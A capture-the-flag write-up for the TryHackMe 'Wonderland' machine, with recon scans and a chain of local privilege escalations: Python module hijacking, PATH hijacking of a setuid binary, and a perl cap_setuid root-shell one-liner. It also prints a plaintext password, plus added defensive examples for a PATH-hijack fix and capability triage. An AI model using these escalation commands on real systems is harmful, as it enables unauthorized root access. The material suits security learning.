#tryhackme #linux #medium #capabilities #PATH
![[Pasted image 20250705152241.png]]
---
# Information Gathering - Nmap
Started off with an Nmap TCP SYN scan against all 65535 ports, which found two open ports: 22 and 80.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n -open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:43 CDT
Nmap scan report for 10.10.254.198
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 23.18 seconds
```
Ran a version and default-script scan (`-sCV`) against the two open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:44 CDT
Nmap scan report for 10.10.254.198
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
```
The UDP scan found nothing confirmed open: of the top 1000 ports, 994 came back `open|filtered` (no response) and the rest closed. Note that at `--min-rate 3000` the whole scan took 1.25 seconds, which is too fast for a reliable UDP result, so "no response" here should not be read as "nothing listening".
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:45 CDT
Nmap scan report for 10.10.254.198
Host is up (0.14s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
1645/udp closed radius
16573/udp closed unknown
17205/udp closed unknown
17505/udp closed unknown
28840/udp closed unknown
49159/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
```
---
# Footprinting
##### Port 80
![[Pasted image 20250705124915.png]]
`gobuster` revealed some directories. I first navigated to `/r`
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.254.198
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
/http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /http:/www]
```
`/r` didn't have anything useful, but the page tells me to keep going, so I ran `gobuster` again against `/r`, which revealed `/a`. Each level repeated the same pattern, one directory at a time:
![[Pasted image 20250705130124.png]]
`/r/a`
![[Pasted image 20250705130256.png]]
`/r/a/b`
![[Pasted image 20250705130341.png]]
`/r/a/b/b`
![[Pasted image 20250705130432.png]]
`/r/a/b/b/i`
![[Pasted image 20250705130505.png]]
# Exploit
I finally reached `/r/a/b/b/i/t`. The 'Keep Going' sign is gone, and now it says to open the door and enter Wonderland. The creator of this machine really nailed the Alice in Wonderland theme. It's very cool :)
![[Pasted image 20250705130545.png]]
In the Page Source, I found what appears to be a set of credentials.
![[Pasted image 20250705131119.png]]
# Lateral Movement (alice > rabbit)
##### Port 22
Successfully logged into SSH server as `alice`
```bash
alice@wonderland:~$ whoami
alice
```
In `/home/alice`, there are two files: `root.txt` and `walrus_and_the_carpenter.py`. Both are owned by `root`; `root.txt` is mode `600`, so `alice` cannot read it, but the script is world-readable.
```bash
alice@wonderland:~$ ls
root.txt walrus_and_the_carpenter.py
alice@wonderland:~$ ls -l
total 8
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
```
I ran the script and it worked as-is. It imports the `random` module and, when executed, prints 10 randomly chosen lines of the poem.
```bash
alice@wonderland:~$ cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
<SNIP>
for i in range(10):
line = random.choice(poem.split("\n"))
```
`sudo -l` shows that `alice` can run this script as `rabbit` with `python3.6`. Note that the rule names the script by absolute path inside `/home/alice`, a directory alice controls. How can we turn that into a shell as `rabbit`?
```bash
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
Notice that `walrus_and_the_carpenter.py` imports the `random` module. When a script is run as `python3 /path/to/script.py`, the interpreter puts the script's own directory (not the current working directory) at the front of `sys.path`, so that is the first place it looks for `random`. The script lives in `/home/alice`, which alice owns, so a file named `random.py` placed there shadows the standard-library module and is executed, as `rabbit`, the moment the script imports it.
```bash
alice@wonderland:~$ echo 'import os; os.system("/bin/bash")' > random.py
alice@wonderland:~$ ls
random.py root.txt walrus_and_the_carpenter.py
```
Successfully moved from `alice` to `rabbit`.
```bash
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
```
# Lateral Movement (rabbit > hatter)
In `/home/rabbit` there was a file named `teaParty` with both the SUID and SGID bits set (`-rwsr-sr-x`). Since it is owned by `root`, it runs with root's privileges, which makes it the obvious thing to look at.
```bash
rabbit@wonderland:/home/rabbit$ ls -l
total 20
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
```
Running it and typing junk at the prompt produced `Segmentation fault (core dumped)`. That can hint at unsafe input handling such as a buffer overflow, but it needs confirming in the binary before spending time on it; as it turns out, there is a simpler way in.
```bash
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 05 Jul 2025 20:15:06 +0000
Ask very nicely, and I will give you some tea while you wait for him
asdf
Segmentation fault (core dumped)
```
I transferred the file to my local environment to decompile the file.
```bash
rabbit@wonderland:/home/rabbit$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.23.133.183 - - [05/Jul/2025 19:20:13] "GET /teaParty HTTP/1.1" 200 -
```
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ wget http://$IP:8888/teaParty
--2025-07-05 14:20:13-- http://10.10.254.198:8888/teaParty
Connecting to 10.10.254.198:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16816 (16K) [application/octet-stream]
Saving to: ‘teaParty’
teaParty 100%[==========================>] 16.42K --.-KB/s in 0.1s
2025-07-05 14:20:13 (124 KB/s) - ‘teaParty’ saved [16816/16816]
```
In order to decompile the program, I will use `Ghidra`, a software reverse-engineering tool. You can install `Ghidra` in Kali by running `sudo apt install ghidra`
After importing `teaParty`, right-click it and select `Open With` > `CodeBrowser`.
![[Pasted image 20250705143139.png]]
When prompted to analyze the program, select 'Yes'. The listing you see first is the disassembly, which is not easy to read. Ghidra's decompiler produces C-like pseudocode from it.
To do this, we need to open the `Decompiler` window. `Window > Decompiler`. Then, in the `Symbol Tree` menu in the left-hand side of the window, find `main` function. Upon selecting the main function, you will see the translated C source code in the Decompiler window.
![[Pasted image 20250705143635.png]]
`teaParty` calls `setuid(0x3eb)`. 0x3eb is 1003 in decimal, and back on the Wonderland machine `id 1003` shows that this UID belongs to `hatter`. So although the binary is setuid root, it drops to `hatter` before doing its work, and because that call is made while running as root it changes the real, effective and saved UIDs together, so there is no way back. Whatever we get out of this binary will run as `hatter`, not as `root` or `rabbit`.
Another thing to note: to print the time, `teaParty` runs the external `date` program through a shell command rather than by its absolute path `/bin/date`. The shell resolves a bare `date` by walking the directories listed in the `PATH` environment variable, in order, and runs the first match. The kernel strips variables such as `LD_PRELOAD` from setuid executions, but it leaves `PATH` alone, so the binary inherits whatever `PATH` we set. Prepending a directory we control to `PATH` makes the shell find our `date` first.
![[Pasted image 20250705143743.png]]
In `/tmp`, I created a file named `date` containing the single command `/bin/bash` and made it executable.
```bash
rabbit@wonderland:/tmp$ echo "/bin/bash" > date
rabbit@wonderland:/tmp$ chmod +x date
```
Then I prepended `/tmp` to the `PATH` environment variable. Now when `teaParty` looks for `date`, the shell checks `/tmp` first, because it is the first entry in `PATH`.
```bash
rabbit@wonderland:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/tmp$ export PATH=/tmp:$PATH
rabbit@wonderland:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
```
Got the shell: the fake `date` ran `/bin/bash` as `hatter`, which is why the output stops right after `Probably by`.
```bash
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by
hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$
```
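The following is an added example, not code from the Wonderland machine or the write-up, that reproduces the PATH hijack locally and puts the fix next to it. C's `system("...")` hands its string to `/bin/sh -c`, which is exactly what `subprocess.run(..., shell=True)` does below, so the `vulnerable_date` function stands in for the way `teaParty` runs `date`. A constructed fake `date` is placed first on `PATH` to show the hijack; `hardened_date` then repeats the call with the two fixes a setuid program should apply: resolve the binary under a trusted `PATH` rather than the caller's, and scrub the inherited environment. `TRUSTED_PATH`, the fake script's `HIJACKED-DATE` output and the function names are all constructed for this demo.

```python
"""PATH hijacking of an unqualified command, and the two fixes.

Added example (not from the original page). Mirrors system("date") with
/bin/sh -c and shows an attacker-controlled PATH entry winning the lookup.
"""
import os
import shutil
import stat
import subprocess
import tempfile

# What a privileged program should search, instead of trusting the caller's PATH.
TRUSTED_PATH = "/usr/bin:/bin"

# Inert stand-in for the attacker's /tmp/date (which ran /bin/bash).
FAKE_DATE = "#!/bin/sh\necho HIJACKED-DATE\n"


def plant_fake_date(directory: str) -> str:
    """Write an executable fake 'date' into directory and return its path."""
    path = os.path.join(directory, "date")
    with open(path, "w") as fh:
        fh.write(FAKE_DATE)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def vulnerable_date(env: dict) -> str:
    """Equivalent of system("date"): /bin/sh -c resolves 'date' via env['PATH']."""
    out = subprocess.run("date", shell=True, env=env,
                         capture_output=True, text=True)
    return out.stdout.strip()


def hardened_date(env: dict) -> str:
    """Same call with the fixes: binary resolved under a trusted PATH,
    caller's environment discarded (env is accepted only to be ignored)."""
    real_date = shutil.which("date", path=TRUSTED_PATH)  # e.g. /usr/bin/date
    clean_env = {"PATH": TRUSTED_PATH}                   # nothing inherited
    out = subprocess.run([real_date], env=clean_env,
                         capture_output=True, text=True)
    return out.stdout.strip()


def demo() -> dict:
    """Run both variants with the attacker's PATH and return their output."""
    with tempfile.TemporaryDirectory() as attacker_dir:
        plant_fake_date(attacker_dir)
        # The attacker's shell after `export PATH=/tmp:$PATH` in the write-up.
        attacker_env = dict(
            os.environ,
            PATH=attacker_dir + ":" + os.environ.get("PATH", TRUSTED_PATH),
        )
        return {
            "vulnerable": vulnerable_date(attacker_env),
            "hardened": hardened_date(attacker_env),
        }


if __name__ == "__main__":
    for name, output in demo().items():
        print(f"{name:10s}: {output}")
```

Note that the write-up's fake `date` had no `#!` line at all and still ran: when `execve` fails with `ENOEXEC`, `/bin/sh` falls back to interpreting the file as a shell script. The hardening matters because for a setuid binary the caller's environment is untrusted input; the kernel does not sanitise `PATH` on a setuid exec, so the program has to.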
# Privilege Escalation (hatter > root)
In `/home/hatter`, I found `password.txt`. It appears to contain `hatter`'s password in plain text.
```bash
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?
```
I spent a lot of time looking for a privilege-escalation path. Then I checked for binaries with file capabilities set and found that `perl` has `cap_setuid+ep`.
```bash
hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```
Referring to `gtfobins.github.io`, I came up with the one-liner below and got a shell as `root`. It works because `+ep` makes `cap_setuid` effective as soon as `perl` starts, so any script it runs can call `setuid(0)` without the binary being setuid, and the `exec`'d shell inherits UID 0.
```bash
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:~# whoami
root
```
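As an added example (not part of the original write-up), the helper below triages raw `getcap -r /` output the way I wish I had on the first pass: it parses each line and flags binaries whose file capabilities are enough to reach root on their own, which is what `cap_setuid` on an interpreter amounts to. It understands both output syntaxes `getcap` has used: the older `path = cap_x+ep` seen above and the newer `path cap_x=ep` from recent libcap releases. The sample input is constructed from the three lines above plus one line in the newer format; the `ROOT_EQUIVALENT` list is my own triage set, not exhaustive.

```python
"""Triage `getcap -r /` output for root-equivalent file capabilities.

Added example (not from the original page). Parses getcap lines and flags
binaries holding capabilities that give root without any further bug.
"""
import re
from typing import Dict, FrozenSet, List, Tuple

# Capabilities that hand over root outright when held by a binary that will
# run caller-supplied code (an interpreter, an editor, a shell). Triage list,
# not exhaustive.
ROOT_EQUIVALENT = {
    "cap_setuid",           # setuid(0): the perl case above
    "cap_setgid",
    "cap_dac_override",     # bypass file permission checks
    "cap_dac_read_search",  # read any file, e.g. /etc/shadow
    "cap_chown",
    "cap_fowner",
    "cap_setfcap",          # grant yourself further capabilities
    "cap_sys_admin",
    "cap_sys_module",
    "cap_sys_ptrace",
    "cap_sys_rawio",
}

# Constructed sample: the write-up's three lines plus one in the newer format.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
"""

# One clause: comma-separated caps, an operator (= + -), then flag letters
# from e (effective), i (inheritable), p (permitted).
_CLAUSE = re.compile(r"^(?P<caps>[a-z0-9_,]+)(?P<op>[=+-])(?P<flags>[eip]*)$")

CapEntry = Tuple[str, FrozenSet[str]]


def parse_getcap(text: str) -> Dict[str, List[CapEntry]]:
    """Map each path to its (capability, flag-set) pairs."""
    result: Dict[str, List[CapEntry]] = {}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        path, clauses = parts[0], parts[1:]
        if clauses and clauses[0] == "=":   # older libcap: "path = clauses"
            clauses = clauses[1:]
        entries: List[CapEntry] = []
        for clause in clauses:
            m = _CLAUSE.match(clause)
            if not m or m.group("op") == "-":  # '-' removes flags; nothing granted
                continue
            flags = frozenset(m.group("flags"))
            for cap in m.group("caps").split(","):
                entries.append((cap, flags))
        result[path] = entries
    return result


def root_equivalent_binaries(text: str) -> Dict[str, List[str]]:
    """Return {path: [caps]} for binaries holding a root-equivalent capability
    that is effective (e) or at least permitted (p). Permitted-only still
    counts: a program that can call capset(2), as perl can, raises it itself."""
    hits: Dict[str, List[str]] = {}
    for path, entries in parse_getcap(text).items():
        dangerous = sorted({cap for cap, flags in entries
                            if cap in ROOT_EQUIVALENT and flags & {"e", "p"}})
        if dangerous:
            hits[path] = dangerous
    return hits


if __name__ == "__main__":
    for path, caps in root_equivalent_binaries(SAMPLE_GETCAP).items():
        print(f"{path}: {', '.join(caps)}")
```

On the sample this flags both `perl` paths and ignores `mtr-packet` and `ping`, whose `cap_net_raw` only lets them open raw sockets. In practice I pipe `getcap -r / 2>/dev/null` straight into `parse_getcap` rather than eyeballing the list, since the dangerous entries are easy to miss among the legitimate network ones.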